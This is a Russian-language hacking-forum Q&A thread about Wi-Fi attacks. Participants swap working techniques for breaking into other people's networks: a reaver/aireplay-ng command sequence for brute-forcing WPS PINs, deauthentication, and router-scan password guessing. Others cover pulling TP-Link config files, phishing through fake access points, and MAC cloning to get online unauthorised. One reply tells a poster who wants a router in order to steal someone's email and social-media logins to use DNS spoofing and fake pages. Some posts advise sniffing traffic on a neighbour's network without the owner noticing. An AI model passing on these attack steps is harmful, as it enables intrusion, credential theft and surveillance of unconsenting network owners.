Просмотр полной версии : [Wi-Fi, BT] Задай вопрос - получи ответ!
Не совсем вопрос по теме. Стоит китайская iptv-приставка модель zxv10 b700. Можно ли как-то записанные ею программы скопировать на большого брата и как это сделать?
Mr Drill
21.09.2015, 23:45
Какие программы перебирают пароли к ТД по словарю онлайн, т.е. когда к ТД не подключены клиенты по Wi-Fi? Точно видел название и ссылку на форуме, но забыл в какой теме, поискав в этой, не нашёл.
Slavovic
22.09.2015, 00:03
Какие программы перебирают пароли к ТД по словарю онлайн, т.е. когда к ТД не подключены клиенты по Wi-Fi? Точно видел название и ссылку на форуме, но забыл в какой теме, поискав в этой, не нашёл.
Airlin в WIFISlaxe есть.
Vasya123
23.09.2015, 09:59
Для чего нужно выбирать страну в настройках для вайфая? Есть в чем разница? И есть ли какие хитрости для поднятия скорости по вайфаю в модеме.
От выбора страны зависит мощность передатчика, так как в каждой стане для гражданских передатчиков свои ограничения. Например в России 500 мВт, а в США 1 Вт.
Ravenous
24.09.2015, 00:36
Можно ли отредактировать(заменить на фейковые) мак адреса в хендшейке? Я так понимаю что, вы подбирая пароли собираете себе базу (bssid->пароль)?
Сейчас 99 % bssidoв Занесены в геолокационные базы, и можно легко деанонимировать тех, кто постит сюда дамп для брута.
erwerr2321
24.09.2015, 00:42
Можно ли отредактировать(заменить на фейковые) мак адреса в хендшейке? Я так понимаю что, вы подбирая пароли собираете себе базу (bssid->пароль)?
Сейчас 99 % bssidoв Занесены в геолокационные базы, и можно легко деанонимировать тех, кто постит сюда дамп для брута.
База=ESSID+пароль...
а MAC адреса меняй себе на здоровье, с BSSID чуть сложнее...
и деанонимизировать можно кого угодно, если есть большое желание и средства!
Ravenous
24.09.2015, 01:04
База=ESSID+пароль...
а MAC адреса меняй себе на здоровье, с BSSID чуть сложнее...
Не совсем понял, что мне менять на здоровье... Если имелось ввиду MAC адресс AP, он же BSSID.
P.S. Набралось около 10 хэндщейков, ни один не выходит сбрутить, а выкладывать МАК адресса точек,которые рядом это не есть хорошо...
Не совсем понял, что мне менять на здоровье... Если имелось ввиду MAC адресс AP, он же BSSID.
P.S. Набралось около 10 хэндщейков, ни один не выходит сбрутить, а выкладывать МАК адресса точек,которые рядом это не есть хорошо...
Ты в cap файле хочешь BSSID другой поставить? Не получится.
erwerr2321
24.09.2015, 01:19
Не совсем понял, что мне менять на здоровье... Если имелось ввиду MAC адресс AP, он же BSSID.
P.S. Набралось около 10 хэндщейков, ни один не выходит сбрутить, а выкладывать МАК адресса точек,которые рядом это не есть хорошо...
MAC адрес у клиента, у AP BSSID!
Ну так не выкладвай, никто ж не заставляет...
А лучше почитай вот тут http://habrahabr.ru/post/122623/ !
binarymaster
24.09.2015, 02:04
MAC адрес у клиента, у AP BSSID!
BSSID - это MAC адрес, но не наоборот.
Первый термин применим к беспроводным 802.11 устройствам в режимах Infrastructure (ESS) и Ad Hoc (IBSS). Второй же термин более широкий, но его вполне можно использовать как синоним в данном случае.
Можно ли отредактировать(заменить на фейковые) мак адреса в хендшейке?
Да, можно. На подбор пароля это не повлияет, т.к. в хешировании участвует имя сети (ESSID) и пароль, это и имелось ввиду:
База=ESSID+пароль...
Ravenous
24.09.2015, 02:30
MAC адрес у клиента, у AP BSSID!
Ну так не выкладвай, никто ж не заставляет...
как говорится не уверен на 100% лучше промолчи...
P.S. у меня в этом деле стаж 5 лет. я в теме когда 90% сетей были на WEP
Ты в cap файле хочешь BSSID другой поставить? Не получится.
Да вопрос был поставлен, чтобы подсказали конкренто возможность и софт для редактирвоания либо *cap файла, либо *.hccap
erwerr2321
24.09.2015, 02:38
BSSID - это MAC адрес, но не наоборот.
Да, можно. На подбор пароля это не повлияет, т.к. в хешировании участвует имя сети (ESSID) и пароль, это и имелось ввиду:
Это и имелось ввиду!
у меня в этом деле стаж 5 лет. я в теме когда 90% сетей были на WEP
ооо, ну это ж сразу заметно и всё объясняет!!!
binarymaster
24.09.2015, 03:06
софт для редактирвоания *cap
Wireshark; ColaSoft Packet Builder.
софт для редактирвоания *.hccap
WinHex и другие шестнадцатиричные редакторы. Формат файла предельно прост.
Mr Drill
24.09.2015, 19:34
Удалось получить PSK к TP-LINK TL-WR720N, но реквизиты доступа к вэб-морде оказались изменены. Вроде бы у TP-LINK только одна учётная запись admin и название не поменять, только пароль, но перебиральщики класса router scan не справились. Как извлечь conf из роутера для изучения на предмет реквизитов к вэб-морде?
binarymaster
24.09.2015, 20:16
Вроде бы у TP-LINK только одна учётная запись admin и название не поменять, только пароль, но перебиральщики класса router scan не справились.
Добавьте побольше паролей. Ещё можно использовать Bruter.
Как извлечь conf из роутера для изучения на предмет реквизитов к вэб-морде?
GET /userRpm/config.bin
Но без авторизации она не даст...
И ещё конфиг зашифрован алгоритмом DES ECB (ключ гуглить).
Mr Drill
24.09.2015, 22:00
Добавить побольше паролей никогда не помешает, но чутьё подсказывает, что это тупик. Так всё-таки надо на вэб-морде авторизоваться? Модель не нова , как обойти, вдруг эксплоит есть? Как Пытливой_Ане удавалось добыть conf, не зная PSK? И что значит гуглить ключ, он где-то кем-то опубликован?
binarymaster
24.09.2015, 22:18
Модель не нова , как обойти, вдруг эксплоит есть?
Если бы он был, он с большой вероятностью уже был бы в Router Scan.
И что значит гуглить ключ, он где-то кем-то опубликован?
Таки есть. Это уже довольно хорошо вспаханное поле.
Onechester
24.09.2015, 22:21
братцы, планирую пошариться роутер сканом с целю получения доступа к роутеру, который мне нужен для получения доступа к электронной почте и учеткам от социальных сетей, как это все организовать?
братцы, планирую пошариться роутер сканом с целю получения доступа к роутеру, который мне нужен для получения доступа к электронной почте и учеткам от социальных сетей, как это все организовать?
Как вариант подменой ДНС и фейками (Если займешь отпишись в личку)
Mr Drill
25.09.2015, 01:26
Какую локализацию (страну) в настройках Wi-Fi у TP-LINK порекомендуете выставить, чтобы мощность передатчика вывести на максимум? Я не думаю, что возможна интерференция, каналы ведь стандартизованы по частотам.
Резюме. МоЙ эксперимент с установкой региона отличного от России на мощность передачи не повлиял, "эт те туполинк, а ты что хотел )))"...
Какую локализацию (страну) в настройках Wi-Fi у TP-LINK порекомендуете выставить, чтобы мощность передатчика вывести на максимум? Я не думаю, что возможна интерференция, каналы ведь стандартизованы по частотам.
Резюме. МоЙ эксперимент с установкой региона отличного от России на мощность передачи не повлиял, "эт те туполинк, а ты что хотел )))"...
Лично я это заметил на роутерах от ubiquity. Если ставишь Россию то половина мощности теряется. Также и на альфе под виндой там выбор был на сколько я помню, но там били драйвера. Первые были как и полагается 1 Вт а другие 100 мВт
WifiSLAX XFCE 4.11, как в нём включить вызов меню правой кнопкой мыши, тем где вытащить иконку на рабочий стол и т.д? Искал, не нашёл.
Mr Drill
25.09.2015, 21:34
Airodump-ng. Нижний блок данных показывает найденных клиентов, в нём Probes. В источниках описывается по-разному. Либо названия сетей (ESSIDs), с которыми пытался соединиться клиент, либо сети ищущие клиента, если, например, отключен DHCP. Так что описывает это поле?
Airodump-ng. Нижний блок данных показывает найденных клиентов, в нём Probes. В источниках описывается по-разному. Либо названия сетей (ESSIDs), с которыми пытался соединиться клиент, либо сети ищущие клиента, если, например, отключен DHCP. Так что описывает это поле?
Слушай зачем тебе это поле у меня его практически не бывает так как много сетей а экранчик маленький смотри на дата пакеты и радуйся
Идешь в меню "Пуск" (это я по виндовому, чтоб понятней), жмешь ярлык нужной проги левой кнопкой мыши и тянешь на раб.стол или вниз на панель быстрого запуска.
При перетягивании проги на панель задач выскочит окно с вопросом "create new launcher....?" - жми "create launcher".
При запуске проги с помощью ярлыка с раб.стола выскочит окно - жми "mark executable" или в свойствах ярлыка на вкладке permissions поставь галку "allow this file to run run as a program". Всё.
И не забудь все свои старания сохранить в xzm модуль.
Благодарствую. Из всех DE пользуюсь кедами и lxde, крыса из-за таких фокусов не нравится.
Вопрос по фейк-ap. С помощью второго роутера (tp-link) можно ли поднять свою тд, с липовой страничкой авторизации куда бы пользователь вводил свой пароль, логинился и в идеале имел там доступ к инету, ну, чтобы безпалевно всё выглядело для юзера?
Вопрос по фейк-ap. С помощью второго роутера (tp-link) можно ли поднять свою тд, с липовой страничкой авторизации куда бы пользователь вводил свой пароль, логинился и в идеале имел там доступ к инету, ну, чтобы безпалевно всё выглядело для юзера?
Про linset Вы в курсе ?
Вопрос по фейк-ap. С помощью второго роутера (tp-link) можно ли поднять свою тд, с липовой страничкой авторизации куда бы пользователь вводил свой пароль, логинился и в идеале имел там доступ к инету, ну, чтобы безпалевно всё выглядело для юзера?
У вас чтобы зайти в инет нужно в веб морде авторизоваться? или какой логин свинтить хочешь?
Про linset Вы в курсе ?
Linset это бесполезная ерунда. Сколько не юзал, толку от него 0.
У вас чтобы зайти в инет нужно в веб морде авторизоваться? или какой логин свинтить хочешь?
Что значит по "веб-морде"? Я в linset'е поднимал левую ap, зашёл посмотреть с ноута под вантузом, сеть без шифрования, после подключения к ней ничего вводить не предлагается, интернета там естественно нет. Вряд ли туда вообще кто-то станет подключатся и что-то вводить. Интереснее было бы создать свою сеть с названием и мак-адресом как у искомой, чтобы никто не понял, но вопрос с шифрованием не ясен, нужно чтобы его там как такового не было, но жертве при подключение винда предлагала ввести пароль и типа показывала, что есть защищена. Как-то вот так.
Что значит по "веб-морде"? Я в linset'е поднимал левую ap, зашёл посмотреть с ноута под вантузом, сеть без шифрования, после подключения к ней ничего вводить не предлагается, интернета там естественно нет. Вряд ли туда вообще кто-то станет подключатся и что-то вводить. Интереснее было бы создать свою сеть с названием и мак-адресом как у искомой, чтобы никто не понял, но вопрос с шифрованием не ясен, нужно чтобы его там как такового не было, но жертве при подключение винда предлагала ввести пароль и типа показывала, что есть защищена. Как-то вот так.
На сколько я понял та хочешь создать фейк точки доступа с таким же ESSID и BSSID чтоб юзверь перепутал со своей? Но пороль прилет в зашифрованном виде смысл в чем?
На сколько я понял та хочешь создать фейк точки доступа с таким же ESSID и BSSID чтоб юзверь перепутал со своей? Но пороль прилет в зашифрованном виде смысл в чем?
Смысл в том, чтобы пользователь вбил свой реальный пароль в фейковую тд. Точка прикидывается зашифрованной, пароль вбивается, подсматриваем искомую комбинацию и вуаля.
Mr Drill
26.09.2015, 05:15
Смысл в том, чтобы пользователь вбил свой реальный пароль в фейковую тд. Точка прикидывается зашифрованной, пароль вбивается, подсматриваем искомую комбинацию и вуаля.
Комбинацию чего, суперпозиции энтропии? Написал же сам, что нет авторизации! И в любом случае, наверняка необходимо будет как-то исходную ТД вырубить.
Mr Drill
26.09.2015, 05:16
Слушай зачем тебе это поле у меня его практически не бывает так как много сетей а экранчик маленький смотри на дата пакеты и радуйся
Можно увидеть, кто по точкам шарит и т.п. Но можно ли? Что показывает это поле в действительности?
Подскажите пожалуйста что делать когда reaver зацикливается на первом же пароле? Установил БТ 5.3 на флешку, там и юзаю.
ну народ это да....... Если честно я ни фига от вас добиться не магу какой пароль от чего?????
Andrey9999
27.09.2015, 03:50
Подскажите пожалуйста что делать когда reaver зацикливается на первом же пароле? Установил БТ 5.3 на флешку, там и юзаю.
ничего не сделаешь - ищи другую точку (может у кого старый роутер стоит))
erwerr2321
27.09.2015, 04:10
Подскажите пожалуйста что делать когда reaver зацикливается на первом же пароле? Установил БТ 5.3 на флешку, там и юзаю.
Можно попробовать так:
1 окно Терминала:
airodump-ng -c x wlan0
2 окно Терминала:
aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX wlan0
3 окно Терминала:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c x -A -vvv --no-nacks --win7
Очень часто это помогает!
Можно попробовать так:
1 окно Терминала:
airodump-ng -c x wlan0
2 окно Терминала:
aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX wlan0
3 окно Терминала:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c x -A -vvv --no-nacks --win7<br/>
Очень часто это помогает!
Спасибо! Открыл в разных терминалах помогло.
Но появилась другая проблема, при переборе пин пишется блокировка "Detected AP rate limiting, waiting 60 seconds before re-checking". С такой блокировкой пин будет подбираться не меньше 3 суток. Может кто подскажет что можно сделать?
erwerr2321
28.09.2015, 10:09
Спасибо! Открыл в разных терминалах помогло.
Но появилась другая проблема, при переборе пин пишется блокировка "Detected AP rate limiting, waiting 60 seconds before re-checking". С такой блокировкой пин будет подбираться не меньше 3 суток. Может кто подскажет что можно сделать?
И вообще..., если это тот твой Keenetic Lite II, пробуй PIN 43190706 ... причём скорее всего, reaver в итоге, кроме известного PIN кода, ничего интересного тебе не расскажет, а вот JumpStart другое дело...!
А так с таймаутами играйся..., ну а как ты хотел!?
И вообще..., если это тот твой Keenetic Lite II, пробуй PIN 43190706 ... причём скорее всего, reaver в итоге, кроме известного PIN кода, ничего интересного тебе не расскажет, а вот JumpStart другое дело...!
А так с таймаутами играйся..., ну а как ты хотел!?
Для Asus подбираю PIN. Если не получится то попробую в JumpStart.
erwerr2321
28.09.2015, 13:29
Для Asus подбираю PIN. Если не получится то попробую в JumpStart.
Да, тот ASUS подбирать!
А JumpStart'ом к Keenetic коннектись!
Да, тот ASUS подбирать!<br/>
А JumpStart'ом к Keenetic коннектись!
Спасибо, так и сделаю. Но сначала, чтобы не останавливаться на пол дороги, пытаюсь подобрать PIN на другом неизвестном роутере. Reaver запустил часов 10 назад, зациклился на 45%, очень часто повторяет "Sending EAPOL START request иWARNING: Receive timeout occurred". Сейчас думаю как это обойти.
В WIFISLAX 4.11 что лучше всего использовать для подбора или обхода аутентификации входа в вэб морду раутера если пароль по умолчанию сменили.Раутер ZYXEL.Спасибо за ответ.
erwerr2321
29.09.2015, 01:17
В WIFISLAX 4.11 что лучше всего использовать для подбора или обхода аутентификации входа в вэб морду раутера если пароль по умолчанию сменили.Раутер ZYXEL.Спасибо за ответ.
https://forum.antichat.ru/threads/424494/page-22#post-3886556
Да, тот ASUS подбирать!<br/>
А JumpStart'ом к Keenetic коннектись!
Попробовал JumpStart - PIN-код не тот, и роутер Keenetic Lite III. Также просканировал wps, появился статус wps Locked yes, раньше было нормально. Пробовал сделать Dos атаку на точку, wps Locked стал NO, но через какое то время снова стал YES. Не знаю что с ней делать :-(
Попробовал JumpStart - PIN-код не тот, и роутер Keenetic Lite III. Также просканировал wps, появился статус wps Locked yes, раньше было нормально. Пробовал сделать Dos атаку на точку, wps Locked стал NO, но через какое то время снова стал YES. Не знаю что с ней делать :-(
Через какое время? Пин знаешь?
Если то и другое ответ да, то минут 5 то тебе хватит чтобы через пин стащить пароль точки.
Mr Drill
30.09.2015, 00:16
Здесь описывается уязвимость easy setup assistant от TP-Link http://www.auditoriaswireless.net/w...iccionario-claves-wpa2-de-los-tp-link_xxxxxx/
Но есть такая же для Дилинк и линксис. Где есть описание на английском или русском и сами программы?
Вообще часто попадаются 10-символьные пароли, кто пользовался, бывает польза?
henri2002
30.09.2015, 02:35
Здесь описывается уязвимость easy setup assistant от TP-Link http://www.auditoriaswireless.net/w...iccionario-claves-wpa2-de-los-tp-link_xxxxxx/
Но есть такая же для Дилинк и линксис. Где есть описание на английском или русском и сами программы?
Вообще часто попадаются 10-символьные пароли, кто пользовался, бывает польза?
http://rghost.ru/8KqvTDRy4
http://rghost.ru/7ZScr98Kk
http://rghost.ru/8kjRgVJLP
Mr Drill
30.09.2015, 05:20
http://rghost.ru/8KqvTDRy4
http://rghost.ru/7ZScr98Kk
http://rghost.ru/8kjRgVJLP
Linksys-GenKeys сиды вместо ключей генерирует? А Linksys-GenSeeds генерирует словарь сидов/паролей. Как эти сиды-зёрна вообще использовать? Инструкция на английском где-нибудь есть? Или всё это бестолково и потому не переводилось никем?
Всем привет!Вроде ветка про wifi.Интересует такой вопрос,как в виндовс 7 сделать виртуальный вифи минипорт на конкретном адаптере?А то создается каждый раз на встроенной в ноут карте,а нужно сделать на внешнем юсб адаптере.
Первый вариант - в управлении сетями просто отключи встроенный, тогда будет задействован внешний.
Второй вариант - в проге Magic WiFi есть выбор адаптеров, и вроде в остальных ей подобных тоже.
Не люблю я подобные проги с кучей троянов.Уверен есть метод в самом виндовсе,не отключая встроенный,но вот кто его знает?))
здравствуйте всем помогите с проблемой, есть скрытые сети открытые 1 и 1 закрытый , сигнал хороший , поймать хендшейк не получается так как клиентов вообще не показывает , DATA летает , пробовал и airodump-ng ждал 2 часа , и mdk3 пробовал , вообщем что делать ?
erwerr2321
01.10.2015, 18:01
здравствуйте всем помогите с проблемой, есть скрытые сети открытые 1 и 1 закрытый , сигнал хороший , поймать хендшейк не получается так как клиентов вообще не показывает , DATA летает , пробовал и airodump-ng ждал 2 часа , и mdk3 пробовал , вообщем что делать ?
Если data пакеты идут, значит клиент есть! Просто ты далеко от него...попробуй поближе подойти!
Ну а wps активен?
при сканировании wps скрытые сети не выходят , а если ввести вручную mac то wps не начинает перебирать просто виснет
erwerr2321
01.10.2015, 19:14
при сканировании wps скрытые сети не выходят , а если ввести вручную mac то wps не начинает перебирать просто виснет
А BSSID у них какие?
А BSSID у них какие?
78:54:2E:81:33:A9 открытый
WPA2/PSK 4C:F2:BF:32:8E:8C закрытый
Здравствуйте! Подскажите как нибудь вообще реально найти поймать словить и.т.д Хендшейк если к нему никто не подключен? всмысле wi-fi есть а вот подключений к нему нету. Спасибо
Через какое время? Пин знаешь?
Если то и другое ответ да, то минут 5 то тебе хватит чтобы через пин стащить пароль точки.
Пин не знаю, теперь все время locked. И таких две точки набралось
Нереально. Остается пробовать подбор wps (PixieScript, Bully, Reaver и GoyscriptWPS) или RouterScan+базы.
а можно поподробней,я примерно предполагаю какой ключ,8 значный впереди два нуля. что можно сделать? или в какой теме есть такой подбор по WPS?
erwerr2321
02.10.2015, 11:52
78:54:2E:81:33:A9 открытый
WPA2/PSK 4C:F2:BF:32:8E:8C закрытый
Ясно...
Говорю же тебе, если data идут, значит, клиент там есть, и если уж так горит, возьми ноут и подойди ближе к AP!
Далее airodump+wireshark или airodump+aireplay --deauth.
ИМХО, брутить ESSID - бердово!
Ну по первому всякие вариации dlink, ещё можно попробовать, да и то....,а за второй и браться не стоит (хотя, опять же, можешь прогуляться с airodump'ом и по BSSID 4C:F2:BF:XX:XX:XX 78:54:2E:XX:XX:XX других точек посмотреть ESSID, которые им свойственны на твоей местности, и тогда уже исходя из полученной инфы действовать), там всё что угодно может быть!
Не ленись, пойди прогуляйся!
P.S.: Прикольно, на сайте производителя 2-ой AP, нашёл множество SQLi!)))
Ребят я че то недогоняю, не запускается у меня wifibrute пишет типо ваша версия устарела скачайте с оф сайта и.т.д! Захожу скачиваю и все равно ваша версия устарела. Может кто нибудь поделитесь рабочей версией чтоб не требовала обновлений.СПС
Mr Drill
02.10.2015, 18:20
В справке апрельского airodump-ng указано: "If the AP supports WPS, the first field of the column indicates version supported. The second field indicates WPS config methods (can be more than one method, separated by comma): USB = USB method, ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC = External NFC, INTNFC = Internal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD = Keypad. Locked is displayed when AP setup is locked."
В маяках указывается интерфейс, по которому конфигурировалась ТД, почему это важно? Что означает DISP? Где более подробное описание этой колонки?
forest1012
03.10.2015, 16:58
Скажите такая проблема, ррутер тп линк 3420 подключаю черещ модем мегафон 4г было все нормально, сегодня значит стал пропадать wifi, лампочка на роутере wifi пропадает,помогает отключения включения роутера и то на 5минут потом опять так же??
как затстаить тп-линки раздавать интернет обратно в ВАН порт, (с целью халявы)
P$
Удивительным образом у меня в сети так работаю асусы 10n, то есть сижу на ихнем интрнете, при чем в "подключенных клиентах" в вэбморде роутреа, не отображаюсь как клиент (то есть там вообще нигде нету моего ip или мака). 0_0.
Настройки вроде бы дефолтные.
Интересую тп линки ибо их много.
Всем привет.
Подскажите как усилить прием сигнала Wifi, работаю в кафе, но чем больше приходит посетителей, тем больше тормозит комп. Выгонять посетителей не буду) Спасибо
Всем привет.
Подскажите как усилить прием сигнала Wifi, работаю в кафе, но чем больше приходит посетителей, тем больше тормозит комп. Выгонять посетителей не буду) Спасибо
Скорее всего тебе не усилить сигнал нужно, а увеличить число клиентов подключаемых к wifi точке.
поставь еще роутер и включи на нем режим репитера (WDS). А комп тормозит из медленного инета увеличивай пропускную способность тырнета
Скорее всего тебе не усилить сигнал нужно, а увеличить число клиентов подключаемых к wifi точке.
поставь еще роутер и включи на нем режим репитера (WDS). А комп тормозит из медленного инета увеличивай пропускную способность тырнета
я клиент кафе поэтому поставить роутер не могу, только что взял антенну для усиление сигнала wifi, буду пробовать...
Что касается увеличенния пропускной способности так в - Диспетчер пакетов QoS выставил 1 . с
я клиент кафе поэтому поставить роутер не могу, только что взял антенну для усиление сигнала wifi, буду пробовать...
Что касается увеличенния пропускной способности так в - Диспетчер пакетов QoS выставил 1 . с
а доступ есть к админке роутера?
Есть TL-WR841ND, можно ли к нему залить модернизированную прошивку для усиления сигнала (со 100мв на 200мв например), так как в стандартной прошивке есть возможность выбирать регион , но работает ли он (тут про 7200 писали , что его так тупо туполинки напилили , что больше 100мв ничего не сделаешь ) ?
larinvlad
11.10.2015, 18:31
Получил пароль, подключился к сети, но она без доступа к интернету. Клонировал мак с которым там сидять, инет в телефоне появился, но на вин7 сменит мак это геморой и на след запуск все слетит.
Так же, нет доступа к 192.168.0.1 и 192.168.1.1 даже с клонированным маком. Что делать, как быть ?
По мак пытался узнать производителя, но ни чего по этому маку.
Получил пароль, подключился к сети, но она без доступа к интернету. Клонировал мак с которым там сидять, инет в телефоне появился, но на вин7 сменит мак это геморой и на след запуск все слетит.
Так же, нет доступа к 192.168.0.1 и 192.168.1.1 даже с клонированным маком. Что делать, как быть ?
По мак пытался узнать производителя, но ни чего по этому маку.
Морды нет в 192.168.0.1 ? Так ты узнай сначала айпи к которому ты подключился . Центр управления и общим доступом - сеть - сведения там и увидишь нужный айпи
larinvlad
11.10.2015, 18:51
https://www.sendspace.com/file/yuo0k6 скрин
Адреса нет, если я клонировал мак в телефоне, зашел в инет, значит адрес мне он присвоил, как его из андроид вытащить? Там у меня показывает только мой ip 192.168.0.102
android 4.4
Кстати, если в телефоне вводить 192.168.0.1 вай фай отрубается, на пк такое не происходит.
Попробуй 192.168.0.101 ,192.168.0.100. Или тут скачай роутер скан , он тебе просканирует сеть https://forum.antichat.ru/threads/398971/page-63#post-3898657
Получил пароль, подключился к сети, но она без доступа к интернету. Клонировал мак с которым там сидять, инет в телефоне появился, но на вин7 сменит мак это геморой и на след запуск все слетит.
Так же, нет доступа к 192.168.0.1 и 192.168.1.1 даже с клонированным маком. Что делать, как быть ?
По мак пытался узнать производителя, но ни чего по этому маку.
Под андроид если уже есть выход в интернет рекомендую
1. Fing ; 2. WiFi Connection
Andrey9999
12.10.2015, 03:43
https://www.sendspace.com/file/yuo0k6 скрин
Адреса нет, если я клонировал мак в телефоне, зашел в инет, значит адрес мне он присвоил, как его из андроид вытащить? Там у меня показывает только мой ip 192.168.0.102
android 4.4
Кстати, если в телефоне вводить 192.168.0.1 вай фай отрубается, на пк такое не происходит.
С liveCD линуксового попробуй подключиться и посмотреть
Kaspermaz
12.10.2015, 04:38
Хотел узнать как сделать так чтоб в зоне видемости открытой точки клиенты подключались именно на на эту точку
а доступ есть к админке роутера?
Увы, доступа к админке роутера нет, но надо попробовать, подскажи что надо там изменить или вписать если зайду туда.
Смотри как у меня: работаю на виртуалке, пока ХР, на нее закинул дабл впн и выход в нет, установил антенну для усиление сигнала wifi и получается, осн связь - 1.0Гбит/с, wifi с антеной - 65 мбит/с, впн - 10.0 Мбит/с. Как усилить или увеличить выход в нет с ВПН? Говорят, впн берет большую часть на себя.
fury_makers
15.10.2015, 10:18
Как установить wifi metropolis на убунту 14.04?
larinvlad
16.10.2015, 19:31
Имеется точка, уровень сигнала средний, из-за чего с большим трудом открываются страницы в браузере.
Попасть в админ панель не получается, видать пароль стандартный сменили.
Как узнать пароль ?
Возможно ли его прошить так, что бы потом увеличить мощность сигнала?
Скрин со странецей входа в роутер прилагаю.
https://www.sendspace.com/file/0lxea4
C роутерскан просканировал, но пасса не получил.
посмотри что там какие шлюзы в настройках стоят. Может там авторизация через веб сервер стоит, тоесть когда ты вводишь log/pass твоя машина с ip и mac добавляется в разрешение на прокси серв. А может это фейк))
)
Mr Drill
19.10.2015, 15:17
В статистике аэромона -1 в столбце PWR означает, что сигнал слишком низкий или всё-таки точка доступа скрывается, а то в меня закралось сомнение, клиенты есть и пакеты данных шуруют, и ESSID не виден ни в соответствующем столбце, ни в probe? Мой приёмник RSSi объективно определяет или как-то из маяков точки берёт какую-то информацию и экстрополирует?
--ignore-negative-one попробуй с этим параметром
fury_makers
20.10.2015, 18:08
Какая програма лучше всего подходит для перехвата трафика в открытых вайфай сетях?
Vasiliy1024
20.10.2015, 19:51
У меня есть wifislax. Я нашёл BSSID соседа 14:CC:206:62:B2 Роутер у него TP-LINK_D662B3. Возможно его как-то взломать?
Какая програма лучше всего подходит для перехвата трафика в открытых вайфай сетях?
смотря для чего если инет воровать то хоть winXP, а если трафик снифать то лучше backtrack или kali Linux c предустановленным wireshark и airckrack-ng.
avatara122
20.10.2015, 20:38
У меня есть wifislax. Я нашёл BSSID соседа 14:CC:206:62:B2 Роутер у него TP-LINK_D662B3. Возможно его как-то взломать?
поймал хэш и дальше либо сам бруть либо тут выложи в одну из тем ( платный или бесплатный подбор)
Vasiliy1024
20.10.2015, 20:49
А как его поймать? Подскажите где почитать пож
У меня есть wifislax. Я нашёл BSSID соседа 14:CC:206:62:B2 Роутер у него TP-LINK_D662B3. Возможно его как-то взломать?
А как его поймать? Подскажите где почитать пож
читай инфу про aircrack-ng GUI
Vasiliy1024
21.10.2015, 00:33
А если я открыл пуск >Wifislax>Wpa>Handshaker там выбрал MDK3 появилось окошко. В окошке в правом верхнем углу появилась надпись хеш. Я зашёл opt/Handshaker/rades там нашёл мой файл с расширением cap 900кб. Это оно?
Volum4ik
21.10.2015, 02:41
Здравствуйте, у меня в универе есть Wi-FI сеть "Eduroam" (https://www.eduroam.org), но там при подключении с ноутбука просит логин и пароль, подскажите как я могу подключиться к ней с помощью точки доступа? в настройках нигде не могу найти нужный тип шифрования с логином и паролем (Dlink DAP 1150). Как я понял там этот протокол шифрования (EAP-TTLS либо PEAP). Есть хоть какая то возможность подключить к ней точку доступа?
Andrey9999
21.10.2015, 06:39
А если я открыл пуск >Wifislax>Wpa>Handshaker там выбрал MDK3 появилось окошко. В окошке в правом верхнем углу появилась надпись хеш. Я зашёл opt/Handshaker/rades там нашёл мой файл с расширением cap 900кб. Это оно?
Нет, нужно кое-что на флешку или в образ добавить (hashcat и дрова на видюху)
Проще здесь свой .cap выложить
Здравствуйте, у меня в универе есть Wi-FI сеть "Eduroam" (https://www.eduroam.org), но там при подключении с ноутбука просит логин и пароль, подскажите как я могу подключиться к ней с помощью точки доступа? в настройках нигде не могу найти нужный тип шифрования с логином и паролем (Dlink DAP 1150). Как я понял там этот протокол шифрования (EAP-TTLS либо PEAP). Есть хоть какая то возможность подключить к ней точку доступа?
Это точка доступа с WPA/WPA2 - Enterprise (с Radius сервером). Скорее всего кроме пароля /логина ещё и сертификат нужен для подключения. Ломается она оооооочень геморно ,если вообще ломается.
fury_makers
23.10.2015, 17:48
читай инфу про aircrack-ng GUI[/QUOTE
Вопрос, а Intercepter-ng, может перехватывать трафик в открытых сетях? А то при сканировании перехватываеться только мой трафик.
Triton_Mgn
23.10.2015, 19:20
Intercepter-ng не смотрит открытая сеть или закрытая, ведь изначально ты к ней подключен, то-что перехватывает только твой траффик...- какой ip работает в NAT, какие методы используются? Ssl strip mitm и так далее, все перехватывается независимо ведь ты уже внутри сети.
А вот еще прикол Eset Smart Security 9.0.318.20 палит все попытки , что то сделать интерцептором , ладно если ты где то в макдаке с открытой сетью балуешься, а если сидишь на соседском WiFi это вызовет подозрения и как минимум подозрения хозяина сети. Так что мне кажется нужно ловить просто весь траффик не перенаправляя его через себя а потом копать. У кого какие идеи?
если вот этим
pyrit -r ./*.cap -o ./*.pcap strip
очищаю от лишнего cap файл то в итоговом остаются только 1,2 и 3 хотя в исходном были все четыре подряд и из одной сессии. и так на всех каких пробовал. этого достаточно или какого ключа не достаёт в командной строке для пирита?
спасибо.
w_cooper
25.10.2015, 22:00
А если имеется два хендшейка от разных клиентов на одну точку - это никак не ускорит брут?
это никак не ускорит брут?
никак.
в хешкете можно слить в один файл и скорость упадет в два раза.
в евса вручную переставлять и запускать, тоже нецелесообразно.
Подскажите, можно ли настроить Live CD kali linux 2.0, что бы он поддерживал nvidia/radeon? Вроде дрова вставют, а работать не дает видимо старый опенсоурсный драйвер для нвидии. В гугле ничего не нашел. Можэет быть у кого есть кастомные сборки, где эти проблемы решены. Проблема нвидии и проблема нормального драйвера для alfa 8187 (где мощность можно поднимать до 30 db).
Спасибо.
существуют ли утилиты наподобие InSSIDer только не под винду а под kali linux? при помощи InSSIDer удобно выставить направленную антенну так чтоб сигнал от определенной точки шел непрерывно (по графику видно) и когда сигнал слабый удается получить стабильную связь.
ps сниффер в gerix wifi cracker умеет это делать (sniff_dump, параметр RXQ) но не знаю как его запустить через командную строку.
существуют ли утилиты наподобие InSSIDer только не под винду а под kali linux? при помощи InSSIDer удобно выставить направленную антенну так чтоб сигнал от определенной точки шел непрерывно (по графику видно) и когда сигнал слабый удается получить стабильную связь.
ps сниффер в gerix wifi cracker умеет это делать (sniff_dump, параметр RXQ) но не знаю как его запустить через командную строку.
обычный airmon-ng норма там столбик по мощности сигнала есть. По ему и ориентируйся.
обычный airmon-ng норма там столбик по мощности сигнала есть. По ему и ориентируйся.
да действительно там тоже столбик RXQ есть, не обратил внимания
Подскажите,какой сейчас самый свежий драйвер для Ralink 3070?Сайт Ralink вообще странный,зайти не могу на него((
avatara122
27.10.2015, 01:23
Скажите, а роутеры вообще понимают пароли с пробелами?
Triton_Mgn
27.10.2015, 13:37
